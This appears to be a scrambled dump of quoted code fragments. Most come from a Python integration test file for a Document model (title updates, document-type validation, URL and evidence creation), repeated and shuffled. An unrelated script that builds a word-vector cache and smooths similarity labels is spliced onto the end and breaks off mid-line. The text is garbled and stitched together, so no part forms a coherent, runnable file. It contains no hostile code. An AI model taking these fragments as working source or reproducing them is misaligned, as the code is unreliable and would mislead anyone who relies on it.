[self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj,", "url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\"", "factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create", "evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\":", "doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def", "create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3,", "doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue(", "Copyright (C) 2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration", "generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name", "from integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models import factories class", "is not None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp, doc", "all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'],", "self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\",", "self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\"", "def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\",", "self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent", "\"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document()", "self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = {", "Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import", "create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\":", "docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", } if", "{ \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular", "document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response =", "all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value", "= Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title =", "Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\"", "def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\":", "obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp)", "TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api =", "self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title", "integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self):", ").all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self):", "resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create", "super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document", ") self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp,", "return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create", "data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return", "\"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"] = doc_type doc_type =", "self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data", "all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict)", "doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\",", "\"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict =", "value for attribute document_type. ' 'Expected options are `URL`, `EVIDENCE`, ' '`REFERENCE_URL`\"', resp.data)", "= \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title})", "# Copyright (C) 2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>", "update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response", "validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())],", "test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\",", "for Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import", "http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from", "obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp =", "import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument,", "Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from", "LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc import", "import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models import", "Api from integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test", "[self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data)", "sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is", "\"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase from", "integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase):", "= { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name =", "test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document =", "def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test", "tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper", "import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint:", "self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title", "def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data =", "} obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp", "from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator from", "self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are `URL`, `EVIDENCE`, '", "all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() )", "\"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\":", "self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are `URL`, `EVIDENCE`, ' '`REFERENCE_URL`\"',", "= self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type,", "integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" #", "\"test_link\", } if doc_type is not None: data[\"document_type\"] = doc_type doc_type = doc_type", "<reponame>Killswitchz/ggrc-core<filename>test/integration/ggrc/models/test_document.py<gh_stars>0 # Copyright (C) 2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE", "from integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\"", "= doc_type doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data", "file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase", "update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data", "create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation", "document_type.\"\"\" data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], }", "update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\":", "obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for", "None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object(", "self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc)", "import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import", "all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator", "type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not", "create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create", "\"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title)", "data = { \"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name", "\"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict", "disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self):", "\"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def", "resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options", "response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn", "doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type ==", "= self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute", "= self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with", "from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def", "Document\"\"\" from ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api", "pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def", "obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. '", "setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update", "} if doc_type is not None: data[\"document_type\"] = doc_type doc_type = doc_type or", "not None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp, doc =", "= self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are", "= factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type):", "(C) 2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests", "under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models", "\"test_title\", \"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"] = doc_type doc_type", "create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\":", "obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected", "== resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test", "\"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name)", "test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen", "def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document", "generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\"", "\"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\":", "cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen =", "document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self,", "url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\"", "doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None)", "factories class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp()", "= \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title)" ]
[ "tgt_loc, sigma=1, n_steps=100): def phi(zeta): return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5", "pmf def discrete_lerp(a, b, ground_truth): pmf = np.zeros(b - a + 1) c", "smoothed_labels(v, 5)]) for v in values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f: f.write(\"\\n\".join(values))", "for v in values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename,", "/ sigma) denom = x1 - x2 + 1E-4 return y1 / denom", "def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth) def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with", "add_vocab(tok_filename, vocab): with open(tok_filename) as f: for line in f: vocab.update(line.strip().split()) def main():", "open(glove_filename) as f, open(vec_cache_filename, \"w\") as f2: for line in f: tok, vec", "- x) / sigma) y2 = phi((b - x) / sigma) x1 =", "phi((a - x) / sigma) y2 = phi((b - x) / sigma) x1", "n_labels, truth) def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename) as f: values =", "return pmf def discrete_lerp(a, b, ground_truth): pmf = np.zeros(b - a + 1)", "for line in f: tok, vec = line.split(\" \", 1) if tok in", "as f: values = [float(l.strip()) for l in f.readlines()] values = [\" \".join([str(l)", "/= np.sum(pmf) return pmf def discrete_lerp(a, b, ground_truth): pmf = np.zeros(b - a", "ground_truth - f pmf[f - a] = c - ground_truth return pmf def", "numpy as np import data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector cache...\") with", "rrange = np.arange(a, b + 1) pmf = tn.pdf(rrange) pmf /= np.sum(pmf) return", "= np.arange(a, b + 1) pmf = tn.pdf(rrange) pmf /= np.sum(pmf) return pmf", "ground_truth return pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth) def preprocess(filename, output_name=\"sim_sparse.txt\"):", "[float(l.strip()) for l in f.readlines()] values = [\" \".join([str(l) for l in smoothed_labels(v,", "sigma) y2 = phi((b - x) / sigma) x1 = Phi((b - x)", "data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab = set() for name in (\"train\", \"dev\", \"test\"):", "with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename) as", "in values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with", "def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def phi(zeta): return 1 / (np.sqrt(2 *", "+ 1) pmf = tn.pdf(rrange) pmf /= np.sum(pmf) return pmf def discrete_lerp(a, b,", "tn.pdf(rrange) pmf /= np.sum(pmf) return pmf def discrete_lerp(a, b, ground_truth): pmf = np.zeros(b", "erf(x / np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a - x) / sigma) y2", "sigma) denom = x1 - x2 + 1E-4 return y1 / denom -", "1) c = int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c - a, b", "values = [float(l.strip()) for l in f.readlines()] values = [\" \".join([str(l) for l", "= [\" \".join([str(l) for l in smoothed_labels(v, 5)]) for v in values] with", "f = int(np.floor(ground_truth)) pmf[min(c - a, b - a)] = ground_truth - f", "b, tgt_loc, sigma=1, n_steps=100): def phi(zeta): return 1 / (np.sqrt(2 * np.pi)) *", "denom x = tgt_loc direction = np.sign(tgt_loc - (b - a)) for _", "import truncnorm import numpy as np import data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building", "sick_folder = sick_conf.sick_data vocab = set() for name in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder,", "discrete_lerp(1, n_labels, truth) def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename) as f: values", "pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth) def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename))", "tgt_loc_update(x) tn = truncnorm((a - x) / sigma, (b - x) / sigma,", "- y2 / denom x = tgt_loc direction = np.sign(tgt_loc - (b -", "build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector cache...\") with open(glove_filename) as f, open(vec_cache_filename, \"w\") as", "vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def phi(zeta): return", "[\" \".join([str(l) for l in smoothed_labels(v, 5)]) for v in values] with open(os.path.join(os.path.dirname(filename),", "f, open(vec_cache_filename, \"w\") as f2: for line in f: tok, vec = line.split(\"", "/ (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2) def Phi(x): return 0.5 *", "Phi((a - x) / sigma) denom = x1 - x2 + 1E-4 return", "= tgt_loc direction = np.sign(tgt_loc - (b - a)) for _ in range(n_steps):", "a + 1) c = int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c -", "for l in smoothed_labels(v, 5)]) for v in values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\")", "f: for line in f: vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config() sick_conf =", "= data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab = set() for name", "\"w\") as f2: for line in f: tok, vec = line.split(\" \", 1)", "x = tgt_loc - sigma * tgt_loc_update(x) tn = truncnorm((a - x) /", "return pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth) def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing", "argparse import os from scipy.special import erf from scipy.stats import truncnorm import numpy", "- f pmf[f - a] = c - ground_truth return pmf def smoothed_labels(truth,", "y1 / denom - y2 / denom x = tgt_loc direction = np.sign(tgt_loc", "/ sigma) y2 = phi((b - x) / sigma) x1 = Phi((b -", "= [float(l.strip()) for l in f.readlines()] values = [\" \".join([str(l) for l in", "y1 = phi((a - x) / sigma) y2 = phi((b - x) /", "= data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab = set() for name in (\"train\", \"dev\",", "vec = line.split(\" \", 1) if tok in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec))", "(1 + erf(x / np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a - x) /", "line.split(\" \", 1) if tok in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a,", "sigma, (b - x) / sigma, loc=x, scale=sigma) rrange = np.arange(a, b +", "return discrete_lerp(1, n_labels, truth) def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename) as f:", "l in f.readlines()] values = [\" \".join([str(l) for l in smoothed_labels(v, 5)]) for", "= int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c - a, b - a)]", "1) pmf = tn.pdf(rrange) pmf /= np.sum(pmf) return pmf def discrete_lerp(a, b, ground_truth):", "vocab = set() for name in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder,", "in smoothed_labels(v, 5)]) for v in values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f:", "0.5 * (1 + erf(x / np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a -", "denom = x1 - x2 + 1E-4 return y1 / denom - y2", "- x) / sigma, (b - x) / sigma, loc=x, scale=sigma) rrange =", "output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename) as f: values = [float(l.strip()) for l in", "print(\"Preprocessing {}...\".format(filename)) with open(filename) as f: values = [float(l.strip()) for l in f.readlines()]", "direction = np.sign(tgt_loc - (b - a)) for _ in range(n_steps): x =", "/ denom - y2 / denom x = tgt_loc direction = np.sign(tgt_loc -", "tn = truncnorm((a - x) / sigma, (b - x) / sigma, loc=x,", "- x) / sigma) x2 = Phi((a - x) / sigma) denom =", "open(tok_filename) as f: for line in f: vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config()", "f.readlines()] values = [\" \".join([str(l) for l in smoothed_labels(v, 5)]) for v in", "loc=x, scale=sigma) rrange = np.arange(a, b + 1) pmf = tn.pdf(rrange) pmf /=", "line in f: vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder", "\", 1) if tok in vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a, b,", "int(np.floor(ground_truth)) pmf[min(c - a, b - a)] = ground_truth - f pmf[f -", "add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name, \"b.toks\"), vocab) build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab) if __name__", "1E-8)) f = int(np.floor(ground_truth)) pmf[min(c - a, b - a)] = ground_truth -", "vocab: vocab.remove(tok) f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def phi(zeta):", "= int(np.floor(ground_truth)) pmf[min(c - a, b - a)] = ground_truth - f pmf[f", "sigma) x1 = Phi((b - x) / sigma) x2 = Phi((a - x)", "f pmf[f - a] = c - ground_truth return pmf def smoothed_labels(truth, n_labels):", "truth) def preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename) as f: values = [float(l.strip())", "output_name), \"w\") as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename) as f: for", "x1 = Phi((b - x) / sigma) x2 = Phi((a - x) /", "np.exp(-0.5 * zeta**2) def Phi(x): return 0.5 * (1 + erf(x / np.sqrt(2)))", "in (\"train\", \"dev\", \"test\"): preprocess(os.path.join(sick_folder, name, \"sim.txt\")) add_vocab(os.path.join(sick_folder, name, \"a.toks\"), vocab) add_vocab(os.path.join(sick_folder, name,", "{}...\".format(filename)) with open(filename) as f: values = [float(l.strip()) for l in f.readlines()] values", "f: tok, vec = line.split(\" \", 1) if tok in vocab: vocab.remove(tok) f2.write(\"{}", "y2 / denom x = tgt_loc direction = np.sign(tgt_loc - (b - a))", "ground_truth): pmf = np.zeros(b - a + 1) c = int(np.ceil(ground_truth + 1E-8))", "truncnorm((a - x) / sigma, (b - x) / sigma, loc=x, scale=sigma) rrange", "= c - ground_truth return pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth)", "truncnorm import numpy as np import data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print(\"Building vector", "l in smoothed_labels(v, 5)]) for v in values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as", "v in values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab):", "+ erf(x / np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a - x) / sigma)", "f2.write(\"{} {}\".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def phi(zeta): return 1", "sigma * tgt_loc_update(x) tn = truncnorm((a - x) / sigma, (b - x)", "values] with open(os.path.join(os.path.dirname(filename), output_name), \"w\") as f: f.write(\"\\n\".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename)", "scipy.stats import truncnorm import numpy as np import data def build_vector_cache(glove_filename, vec_cache_filename, vocab):", "zeta**2) def Phi(x): return 0.5 * (1 + erf(x / np.sqrt(2))) def tgt_loc_update(x):", "- x2 + 1E-4 return y1 / denom - y2 / denom x", "\".join([str(l) for l in smoothed_labels(v, 5)]) for v in values] with open(os.path.join(os.path.dirname(filename), output_name),", "preprocess(filename, output_name=\"sim_sparse.txt\"): print(\"Preprocessing {}...\".format(filename)) with open(filename) as f: values = [float(l.strip()) for l", "* np.exp(-0.5 * zeta**2) def Phi(x): return 0.5 * (1 + erf(x /", "def discrete_lerp(a, b, ground_truth): pmf = np.zeros(b - a + 1) c =", "pmf = tn.pdf(rrange) pmf /= np.sum(pmf) return pmf def discrete_lerp(a, b, ground_truth): pmf", "c - ground_truth return pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth) def", "- x) / sigma) x1 = Phi((b - x) / sigma) x2 =", "phi((b - x) / sigma) x1 = Phi((b - x) / sigma) x2", "smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth) def preprocess(filename, 